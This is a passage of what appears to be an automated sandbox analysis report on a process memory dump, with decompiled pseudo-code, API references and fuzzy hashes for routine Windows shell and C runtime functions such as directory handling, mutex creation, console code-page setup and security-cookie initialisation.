0x00000000
0x0033eea0
0x0033eea2
0x0033eea2
0x0033eea7
0x0033eea7
0x0033eeaa
0x0033eda4
0x0033edbc
0x0033ede9
0x0033edec
0x0033edf4
0x00000000
0x00000000
0x00000000
0x0033edbe
0x0033edbe
0x0033edca
0x0033eeb2
0x0033eeb4
0x0033eeb4
0x0033eeb4
0x0033eeb7
0x0033eeb9
0x0033eebc
0x0033eec0
0x00000000
0x0033edd0
0x0033edd5
0x00000000
0x0033edd5
0x0033edca
0x00000000
0x0033edbc
0x0033edde
0x0033ede8
0x00000000
0x0033ede8
0x0034c0f7
0x0034c103
0x0034c109
0x0034c111
0x0034c117
0x0034c117
0x0033efea
0x0033efef
0x0034c125
0x0034c125
0x0033eff5
0x0033effb
0x00000000
0x0033effb
0x0033ebcb
0x0033ebce
0x0033ebcf
0x0033ebd2
0x0033ebdb
0x0033ebdb
0x00000000
0x0033ebc5
0x0033e9d9
0x0033e9d9
0x0033e9df
0x0033e9e4
0x0033e9ec
0x0033ea31
0x00000000
0x0033ea33
0x0033e9ee
0x0033e9f8
0x0033e9fa
0x0033ea00
0x0033ea07
0x0033ea0e
0x00000000
0x0033ea10
0x0033ea10
0x0033ea13
0x0033ea16
0x0033ea19
0x00000000
0x0033ea1b
0x0033ea1b
0x0033ea1b
0x0033ea1b
0x0033ea19
0x0033ea24
0x0033ea26
0x00000000
0x0033ea26
0x0033ea22
0x00000000
0x00000000
0x00000000
0x0033ea22
0x0033e9ec
0x0033ea29
0x0033ea2e
0x0033ea2e
0x0033e9d3
0x00000000

APIs

Part of subcall function 003400B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000), ref: 003400C1
Part of subcall function 003400B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000,?), ref: 003400C8

wcschr.MSVCRT ref: 0033EB6D
iswspace.MSVCRT ref: 0033EC37
wcschr.MSVCRT ref: 0033EC4F
longjmp.MSVCRT(0036B8B8,00000001,?,00000000,?,0033ED9F,?,00000000,?), ref: 0034C024
longjmp.MSVCRT(0036B8B8,00000001), ref: 0034C036
longjmp.MSVCRT(0036B8B8,00000001,00000000,?,?), ref: 0034C049
longjmp.MSVCRT(0036B8B8,00000001), ref: 0034C05B

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: longjmp$Heapwcschr$AllocProcessiswspace
String ID:
API String ID: 2511250921-0
Opcode ID: ec8f6607ff3e221ee5534f8d9aaf0155e9bbf649bf7520870ed30d51932d2beb
Instruction ID: 112c4a05d7e5b31b526a921c516538836de48251759ce858c6d1cd7b0ffe7b1f
Opcode Fuzzy Hash: ec8f6607ff3e221ee5534f8d9aaf0155e9bbf649bf7520870ed30d51932d2beb
Instruction Fuzzy Hash: 3B411331600216CAEB335F68DC857BA73A9EF80301F16466AED46AB1D1EF709C84CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003593E2, Relevance: 10.6, APIs: 7, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E003593E2(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				int _v36;
				char _v40;
				signed int _v44;
				void _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				short _t51;
				short _t53;
				void* _t58;
				void* _t59;
				WCHAR* _t61;
				int _t62;
				short* _t75;
				void* _t76;
				short _t77;
				int _t86;
				void* _t87;
				void* _t89;
				void* _t90;
				WCHAR* _t91;
				signed int _t96;

				_t83 = __edx;
				_t68 = _t96;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t96 + 4));
				_t94 = (_t96 & 0xfffffff8) + 4;
				_t39 =  *0x35d0b4; // 0xd59bd0e8
				_v16 = _t39 ^ (_t96 & 0xfffffff8) + 0x00000004;
				_v40 = 1;
				_t86 = 0;
				_v36 = 0x104;
				_v44 = _v44 & 0;
				_t89 = __ecx;
				memset( &_v564, 0, 0x104);
				if(E00340C70( &_v564, ((0 | _v40 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L23:
					__imp__??_V@YAXPAX@Z(_v44);
					_pop(_t87);
					_pop(_t90);
					return E00346FD0(_t49, _t68, _v16 ^ _t94, _t83, _t87, _t90);
				}
				_t51 = 0x3d;
				_v24 = _t51;
				_v22 = _t89 + 0x40;
				_t53 = 0x3a;
				_v20 = _t53;
				_v18 = 0;
				_t91 = E0033CFBC( &_v24);
				if(_t91 == 0) {
					L4:
					_t75 = _v44;
					if(_t75 == 0) {
						_t75 =  &_v564;
					}
					 *_t75 = _v22;
					_t76 = _v44;
					if(_t76 == 0) {
						_t76 =  &_v564;
					}
					 *((short*)(_t76 + 2)) = _v20;
					_t58 = _v44;
					if(_t58 == 0) {
						_t58 =  &_v564;
					}
					_t77 = 0x5c;
					 *((short*)(_t58 + 4)) = _t77;
					_t59 = _v44;
					if(_t59 == 0) {
						_t59 =  &_v564;
					}
					 *((short*)(_t59 + 6)) = 0;
					_t84 = _v44;
					if(_v44 == 0) {
						_t84 =  &_v564;
					}
					_t79 =  &_v24;
					E00343A50( &_v24, _t84);
					_t61 = _v44;
					if(_t61 == 0) {
						_t61 =  &_v564;
					}
					_t62 = SetCurrentDirectoryW(_t61);
					if(_t62 == 0) {
						_push(_t62);
						_push(GetLastError());
						E0033C5A2(_t79);
					}
					if(_t91 != 0) {
						SetErrorMode(_t86);
					}
					L20:
					_t80 =  *0x373cb8;
					if( *0x373cb8 == 0) {
						_t80 = 0x373ab0;
					}
					_t83 =  *0x373cc0;
					_t49 = E003436CB(_t68, _t80,  *0x373cc0, 0);
					goto L23;
				}
				if(SetCurrentDirectoryW(_t91) != 0) {
					goto L20;
				}
				_t86 = SetErrorMode(1);
				goto L4;
			}

0x003593e2
0x003593e5
0x003593e7
0x003593e8
0x003593f3
0x003593f7
0x003593ff
0x00359406
0x00359410
0x00359415
0x00359417
0x0035941a
0x00359425
0x00359427
0x00359450
0x0035954b
0x0035954e
0x00359558
0x0035955b
0x00359567
0x00359567
0x00359458
0x00359459
0x00359463
0x00359469
0x0035946a
0x00359470
0x00359479
0x0035947d
0x00359498
0x00359498
0x0035949d
0x0035949f
0x0035949f
0x003594a9
0x003594ac
0x003594b1
0x003594b3
0x003594b3
0x003594bd
0x003594c1
0x003594c6
0x003594c8
0x003594c8
0x003594d0
0x003594d1
0x003594d5
0x003594da
0x003594dc
0x003594dc
0x003594e4
0x003594e8
0x003594ed
0x003594ef
0x003594ef
0x003594f5
0x003594f8
0x003594fd
0x00359502
0x00359504
0x00359504
0x0035950b
0x00359513
0x00359515
0x0035951c
0x0035951d
0x00359523
0x00359526
0x00359529
0x00359529
0x0035952f
0x0035952f
0x00359537
0x00359539
0x00359539
0x0035953e
0x00359546
0x00000000
0x00359546
0x00359488
0x00000000
0x00000000
0x00359496
0x00000000

APIs

memset.MSVCRT ref: 00359427

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

??_V@YAXPAX@Z.MSVCRT ref: 0035954E

Part of subcall function 0033CFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0035F830,00002000,?,?,?,?,?,0034373A,0033590A,00000000), ref: 0033CFDF

SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 00359480
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 00359490
SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 0035950B
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00359516
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00359529

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
String ID:
API String ID: 920682188-0
Opcode ID: 353461662da47f3cc69544b5d7fabfc600f179a8cae2d1fd3dea3e855ecc42d1
Instruction ID: 306bc4ed035dbee1721a1e87e46521ee7d7c35de109ff14ba24d2e88b1f9606b
Opcode Fuzzy Hash: 353461662da47f3cc69544b5d7fabfc600f179a8cae2d1fd3dea3e855ecc42d1
Instruction Fuzzy Hash: 5241B671A01219ABDF26DFA5DC45FEEB3B8EF08715F00419AE809E7260EB34DA45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00356456, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 125
memoryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00356456(void* __eflags) {
				signed int _v8;
				char _v68;
				void* _v72;
				signed int _v76;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t28;
				signed int _t30;
				void _t31;
				signed int _t36;
				void* _t38;
				short _t39;
				short _t40;
				signed int _t41;
				signed int _t43;
				signed int _t44;
				void* _t46;
				signed int _t47;
				signed int _t49;
				void* _t53;
				signed int _t56;
				short* _t57;
				signed int _t58;
				void* _t59;
				void* _t60;
				signed int _t61;
				signed int _t65;
				void* _t66;
				signed int _t70;

				_t21 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t21 ^ _t70;
				_t49 = 0xe;
				_t67 = "Copyright (c) Microsoft Corporation. All rights reserved.";
				memcpy( &_v68, "Copyright (c) Microsoft Corporation. All rights reserved.", _t49 << 2);
				asm("movsw");
				_t65 = 0;
				_t47 = 0;
				if(E00347735(0) == 0) {
					if(RtlCreateUnicodeStringFromAsciiz( &_v84,  &_v68) == 0) {
						goto L26;
					} else {
						_t67 = _v80;
						_v72 = _t67;
						goto L4;
					}
				} else {
					_t46 =  *0x37c000(L"%WINDOWS_COPYRIGHT%");
					_t67 = _t46;
					_v72 = _t46;
					L4:
					if(_t67 == 0) {
						L26:
						_t28 = 0;
					} else {
						_t30 =  *_t67 & 0x0000ffff;
						_t60 = _t67;
						if(_t30 != 0) {
							_t58 = _t30;
							do {
								if(_t58 == 0xae || _t58 == 0xa9) {
									_t43 = 1;
								} else {
									_t43 = _t65;
								}
								_t60 = _t60 + 2;
								_t47 = _t47 + _t43;
								_t44 =  *_t60 & 0x0000ffff;
								_t58 = _t44;
							} while (_t44 != 0);
							_t67 = _v72;
						}
						_t53 = _t67;
						_t59 = _t53 + 2;
						do {
							_t31 =  *_t53;
							_t53 = _t53 + 2;
						} while (_t31 != _t65);
						_t47 = GlobalAlloc(0x40, 2 + ((_t53 - _t59 >> 1) + _t47 * 2) * 2);
						_v76 = _t47;
						if(_t47 != 0) {
							_t36 =  *_t67 & 0x0000ffff;
							_t66 = _t67;
							_t56 = _t47;
							if(_t36 != 0) {
								_t61 = _t36;
								do {
									if(_t61 == 0xae || _t61 == 0xa9) {
										_t38 = 0x28;
										 *_t56 = _t38;
										_t39 = 0x63;
										 *((short*)(_t56 + 2)) = _t39;
										_t57 = _t56 + 4;
										_t40 = 0x29;
										 *_t57 = _t40;
									} else {
										 *_t56 = _t61;
									}
									_t66 = _t66 + 2;
									_t56 = _t57 + 2;
									_t41 =  *_t66 & 0x0000ffff;
									_t61 = _t41;
								} while (_t41 != 0);
								_t67 = _v72;
								_t47 = _v76;
							}
							_t65 = _t47;
							 *_t56 = 0;
						}
						GlobalFree(_t67);
						_t28 = _t65;
					}
				}
				return E00346FD0(_t28, _t47, _v8 ^ _t70, _t59, _t65, _t67);
			}

0x0035645e
0x00356465
0x0035646d
0x0035646e
0x00356476
0x00356478
0x0035647a
0x0035647c
0x00356485
0x003564a9
0x00000000
0x003564af
0x003564af
0x003564b2
0x00000000
0x003564b2
0x00356487
0x0035648c
0x00356492
0x00356494
0x003564b5
0x003564b7
0x00356589
0x00356589
0x003564bd
0x003564bd
0x003564c0
0x003564c5
0x003564c7
0x003564ce
0x003564d1
0x003564e3
0x003564dd
0x003564dd
0x003564dd
0x003564e4
0x003564e7
0x003564e9
0x003564ec
0x003564ee
0x003564f3
0x003564f3
0x003564f6
0x003564f8
0x003564fb
0x003564fb
0x003564fe
0x00356501
0x0035651d
0x0035651f
0x00356524
0x00356526
0x00356529
0x0035652b
0x00356530
0x00356537
0x0035653c
0x0035653f
0x0035654d
0x0035654e
0x00356553
0x00356554
0x00356558
0x0035655d
0x0035655e
0x00356546
0x00356546
0x00356546
0x00356561
0x00356564
0x00356567
0x0035656a
0x0035656c
0x00356571
0x00356574
0x00356574
0x00356579
0x0035657b
0x0035657b
0x0035657f
0x00356585
0x00356585
0x003564b7
0x0035659b

APIs

RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 003564A1
GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00356517
GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 0035657F

Strings

%WINDOWS_COPYRIGHT%, xrefs: 00356487
@P!u, xrefs: 00356517

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Global$AllocAsciizCreateFreeFromStringUnicode
API String ID: 1103618819-1903673144
Opcode ID: 23345bc3b57494346bab57a3e062a4ab73f417e0519f3cd266b0ed933ffd964e
Instruction ID: dbf4d47fa281cbc1d90f8e06774147e68d76ba542a3008c1447bec251472d1b4
Opcode Fuzzy Hash: 23345bc3b57494346bab57a3e062a4ab73f417e0519f3cd266b0ed933ffd964e
Instruction Fuzzy Hash: 57413675A402158BCF22CF689842BBE73B5EF49701FA9046AED45EB364EA71DD47C380

Uniqueness

Uniqueness Score: -1.00%

Function 003517B6, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E003517B6(char* __ecx, signed int* __edx) {
				intOrPtr _v0;
				signed int _v8;
				char _v528;
				void* _v532;
				signed int _v536;
				void* _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t25;
				void* _t29;
				signed int* _t39;
				char* _t40;
				void* _t54;
				signed int _t55;
				signed int _t57;

				_t40 = __ecx;
				_t20 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t20 ^ _t57;
				_t39 = __edx;
				 *((intOrPtr*)(__edx)) = 0;
				E0034274C( &_v528, 0x104, L"Local\\SM0:%d:%d:%hs", GetCurrentProcessId());
				_t25 =  &_v528;
				__imp__CreateMutexExW(0, _t25, 0, 0x1f0001, 0x40, __ecx);
				_t54 = _t25;
				_v532 = _t54;
				if(_t54 != 0) {
					E00352D6D( &_v532,  &_v540);
					_t49 =  &_v536;
					_v536 = 0;
					_t55 = 0;
					_t53 = E00351578( &_v528,  &_v536,  &_v532);
					if(_t53 >= 0) {
						_t55 = _v536 << 2;
						_t53 = 0;
					} else {
						_push(_t53);
						_push("wil");
						_t49 = 0x6a;
						E0035292C();
					}
					if(_t53 >= 0) {
						if(_t55 == 0) {
							L14:
							_t49 =  &_v532;
							_t40 =  &_v528;
							_t29 = E0035250A(_t40,  &_v532, _t53, _t39);
							_t53 = _t29;
							if(_t29 >= 0) {
								goto L9;
							} else {
								_t49 = 0x129;
								goto L16;
							}
							goto L18;
						} else {
							 *_t39 = _t55;
							_t40 =  *_t55 + 1;
							 *( *_t39) = _t40;
							L9:
							_t53 = 0;
						}
					} else {
						_t49 = 0x121;
						L16:
						_t40 = _v0;
						E0035292C("wil", _t53);
					}
					if(_v540 != 0 && ReleaseMutex(_v540) == 0) {
						_push(_t40);
						L13:
						E00352D56();
						goto L14;
					}
					_t54 = _v532;
				} else {
					_t53 = E00351EBE(_t40);
				}
				L18:
				if(_t54 != 0 && CloseHandle(_t54) == 0) {
					_push(_t40);
					goto L13;
				}
				return E00346FD0(_t53, _t39, _v8 ^ _t57, _t49, _t53, _t54);
			}

0x003517b6
0x003517c1
0x003517c8
0x003517ce
0x003517d5
0x003517ef
0x003517f7
0x00351805
0x0035180b
0x0035180d
0x00351815
0x00351833
0x00351839
0x0035183f
0x0035184b
0x00351852
0x00351856
0x00351871
0x00351874
0x00351858
0x0035185b
0x0035185c
0x00351863
0x00351864
0x00351864
0x00351878
0x00351883
0x003518b7
0x003518b8
0x003518be
0x003518c4
0x003518c9
0x003518cd
0x00000000
0x003518cf
0x003518cf
0x00000000
0x003518cf
0x00000000
0x00351885
0x00351885
0x0035188b
0x0035188c
0x0035188e
0x0035188e
0x0035188e
0x0035187a
0x0035187a
0x003518d4
0x003518d4
0x003518dd
0x003518dd
0x00351897
0x003518a9
0x003518af
0x003518b2
0x00000000
0x003518b2
0x003518e4
0x00351817
0x0035181c
0x0035181c
0x003518ea
0x003518ec
0x003518f9
0x00000000
0x003518fa
0x00351913

APIs

GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 003517D7
CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 00351805
ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,wil,00000000,?,?,?,?), ref: 0035189F
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?), ref: 003518EF

Strings

Local\SM0:%d:%d:%hs, xrefs: 003517DE
wil, xrefs: 0035185C, 003518D8

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Mutex$CloseCreateCurrentHandleProcessRelease
String ID: Local\SM0:%d:%d:%hs$wil
API String ID: 3048291649-2303653343
Opcode ID: 60c37e2c42fc90ed2aac0b3ad9e9a7a5516ff7c09b7347f195e028c029d56250
Instruction ID: cf7bbea1c2249471b079c76ee0827e517fadc3826f9d4e48c8b798ced63e5c18
Opcode Fuzzy Hash: 60c37e2c42fc90ed2aac0b3ad9e9a7a5516ff7c09b7347f195e028c029d56250
Instruction Fuzzy Hash: 5331D872A40128ABCB33EB14CC85FEB7379AB91701F114695FC19AB261DB709E498BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00346E03, Relevance: 10.6, APIs: 7, Instructions: 99
sleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00346E03(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t10;
				intOrPtr _t14;
				intOrPtr _t20;
				intOrPtr* _t21;
				int _t34;
				intOrPtr _t36;
				int _t38;
				void* _t40;
				void* _t47;
				void* _t48;

				_push(0x10);
				_push(0x35be78);
				E003475CC(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t40 - 4)) = 0;
				_t36 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t34 = 0;
				while(1) {
					_t20 = _t36;
					_t10 = 0;
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t36) {
						Sleep(0x3e8);
						continue;
					} else {
						_t38 = 1;
						_t34 = 1;
					}
					L6:
					_t47 =  *0x35d514 - _t38; // 0x0
					if(_t47 != 0) {
						__eflags =  *0x35d514; // 0x0
						if(__eflags != 0) {
							 *0x35d19c = _t38;
							goto L12;
						} else {
							 *0x35d514 = _t38;
							_t10 = E00346F72(_t20, 0x331c04, 0x331c10);
							__eflags = _t10;
							if(__eflags == 0) {
								goto L12;
							} else {
								 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
								goto L24;
							}
						}
					} else {
						_push(0x1f);
						L003473C4();
						L12:
						_t48 =  *0x35d514 - _t38; // 0x0
						if(_t48 == 0) {
							_push(0x331c00);
							_push(0x331bd8);
							L003475C6();
							 *0x35d514 = 2;
						}
						if(_t34 == 0) {
							_t10 =  *0x35d510;
							 *0x35d510 = 0;
						}
						_t51 =  *0x35d520;
						if( *0x35d520 != 0) {
							_t10 = E00347420(_t51, 0x35d520);
							if(_t10 != 0) {
								_t38 =  *0x35d520; // 0x0
								 *0x3794b4(0, 2, 0);
								_t10 =  *_t38();
							}
						}
						_push( *0x35d1a8);
						_push( *0x35d1a4);
						_push( *0x35d1a0);
						E003444FC();
						 *0x35d198 = _t10;
						if( *0x35d1b0 != 0) {
							__eflags =  *0x35d19c;
							if( *0x35d19c == 0) {
								__imp___cexit();
							}
							 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
							L24:
							return E00347614(0, _t34, _t38);
						} else {
							exit(_t10);
							_t21 =  *((intOrPtr*)(_t40 - 0x14));
							_t14 =  *((intOrPtr*)( *_t21));
							 *((intOrPtr*)(_t40 - 0x20)) = _t14;
							_push(_t21);
							_push(_t14);
							L0034731E();
							return _t14;
						}
					}
				}
				_t38 = 1;
				__eflags = 1;
				goto L6;
			}

0x00346e03
0x00346e05
0x00346e0a
0x00346e11
0x00346e1a
0x00346e1d
0x00346e1f
0x00346e24
0x00346e26
0x00346e28
0x00346e2e
0x00000000
0x00000000
0x00346e32
0x00346e40
0x00000000
0x00346e34
0x00346e36
0x00346e37
0x00346e37
0x00346e4b
0x00346e4b
0x00346e51
0x00346e5d
0x00346e63
0x00346e91
0x00000000
0x00346e65
0x00346e65
0x00346e75
0x00346e7c
0x00346e7e
0x00000000
0x00346e80
0x00346e80
0x00000000
0x00346e87
0x00346e7e
0x00346e53
0x00346e53
0x00346e55
0x00346e97
0x00346e97
0x00346e9d
0x00346e9f
0x00346ea4
0x00346ea9
0x00346eb0
0x00346eb0
0x00346ebc
0x00346ec5
0x00346ec5
0x00346ec5
0x00346ec7
0x00346ece
0x00346ed5
0x00346edd
0x00346ee3
0x00346eeb
0x00346ef1
0x00346ef1
0x00346edd
0x00346ef3
0x00346ef9
0x00346eff
0x00346f05
0x00346f0d
0x00346f19
0x00346f51
0x00346f58
0x00346f5a
0x00346f60
0x00346f65
0x00346f6c
0x00346f71
0x00346f1b
0x00346f1c
0x00346f22
0x00346f27
0x00346f29
0x00346f2c
0x00346f2d
0x00346f2e
0x00346f35
0x00346f35
0x00346f19
0x00346e51
0x00346e4a
0x00346e4a
0x00000000

APIs

Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,0035BE78,00000010), ref: 00346E40
_amsg_exit.MSVCRT ref: 00346E55
_initterm.MSVCRT ref: 00346EA9
__IsNonwritableInCurrentImage.LIBCMT ref: 00346ED5
exit.MSVCRT ref: 00346F1C
_XcptFilter.MSVCRT ref: 00346F2E

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
String ID:
API String ID: 796493780-0
Opcode ID: b3c5c0a7d52a5f0a4511c405a337038f85caa72e74f3a87ea87901a2918643af
Instruction ID: 762a4a26035664d40feb3f5ae3e17f1272bdada286ba60db98c9cb670521b44b
Opcode Fuzzy Hash: b3c5c0a7d52a5f0a4511c405a337038f85caa72e74f3a87ea87901a2918643af
Instruction Fuzzy Hash: 003106795447019FDB339F64ED0676537E8EB06726F110429E9469F2F0EB306AC4CA92

Uniqueness

Uniqueness Score: -1.00%

Function 003446D8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 52
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003446D8() {
				int _t3;
				signed int _t6;
				void* _t7;
				void* _t8;
				signed int _t10;
				signed int _t13;
				signed char* _t15;
				void* _t17;
				void* _t18;

				_t3 = GetConsoleOutputCP();
				 *0x363854 = _t3;
				if(GetCPInfo(_t3, 0x363840) == 0) {
					_t6 = GetThreadLocale() & 0x000003ff;
					if(_t6 != 0x11) {
						if(_t6 == 4 || _t6 == 0x12) {
							 *0x363846 = 0xfe81;
						} else {
							 *0x363846 = 0;
						}
					} else {
						 *0x363846 = 0xfce09f81;
						 *0x36384a = 0;
					}
				}
				_t7 = memset(0x377f30, 0, 0x100);
				_t18 = _t17 + 0xc;
				if( *0x363846 != 0) {
					_t15 = 0x363846;
					while(1) {
						_t8 = _t15[1];
						if(_t8 == 0) {
							break;
						}
						_t13 =  *_t15 & 0x000000ff;
						_t10 = _t8 & 0x000000ff;
						if(_t13 <= _t10) {
							_t8 = memset(0x377f30 + _t13, 1, _t10 - _t13 + 1);
							_t18 = _t18 + 0xc;
						}
						_t15 =  &(_t15[2]);
						if( *_t15 != 0) {
							continue;
						}
						break;
					}
					return _t8;
				} else {
					return _t7;
				}
			}

0x003446d8
0x003446e4
0x003446f1
0x0034e8be
0x0034e8c7
0x0034e8e5
0x0034e8fb
0x0034e8ed
0x0034e8ed
0x0034e8ed
0x0034e8c9
0x0034e8c9
0x0034e8d3
0x0034e8d3
0x0034e8c7
0x00344703
0x00344708
0x00344712
0x0034e90b
0x0034e910
0x0034e910
0x0034e915
0x00000000
0x00000000
0x0034e917
0x0034e91a
0x0034e91f
0x0034e92e
0x0034e933
0x0034e933
0x0034e936
0x0034e93c
0x00000000
0x00000000
0x00000000
0x0034e93c
0x0034e93f
0x00344718
0x00344718
0x00344718

APIs

GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(0034458C), ref: 003446D8
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00363840), ref: 003446E9
memset.MSVCRT ref: 00344703
GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 0034E8B8
memset.MSVCRT ref: 0034E92E

Strings

F86, xrefs: 0034E90B

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$ConsoleInfoLocaleOutputThread
String ID: F86
API String ID: 1263632223-1400045826
Opcode ID: 8122d2f009c872847d41412cb2131728efc82cc13cbbcd172a25ca7c632e46c3
Instruction ID: e2c598ed7c76a54e152b32a7cd015a8d695732b46955ae26e98cdce912dc5de8
Opcode Fuzzy Hash: 8122d2f009c872847d41412cb2131728efc82cc13cbbcd172a25ca7c632e46c3
Instruction Fuzzy Hash: 221166B0D0835199EB335B149C0A7A436CCBB00B10F49813AF4C54F9A6D3ED258A9265

Uniqueness

Uniqueness Score: -1.00%

Function 00347513, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00347513() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x35d0b4; // 0xd59bd0e8
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x35d0b4 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x35d0b4 = _t39;
				}
				_t37 =  !_t36;
				 *0x35d0b8 = _t37;
				return _t37;
			}

0x0034751b
0x0034751f
0x00347523
0x00347536
0x00347540
0x0034754c
0x00347555
0x0034755e
0x0034756f
0x00347576
0x00347582
0x00347585
0x00347589
0x00347593
0x00347598
0x00347598
0x0034759a
0x0034759a
0x003475a0
0x003475a3
0x003475ac

APIs

GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00347540
GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0034754F
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00347558
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00347561
QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00347576

Strings

`jw, xrefs: 00347576

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

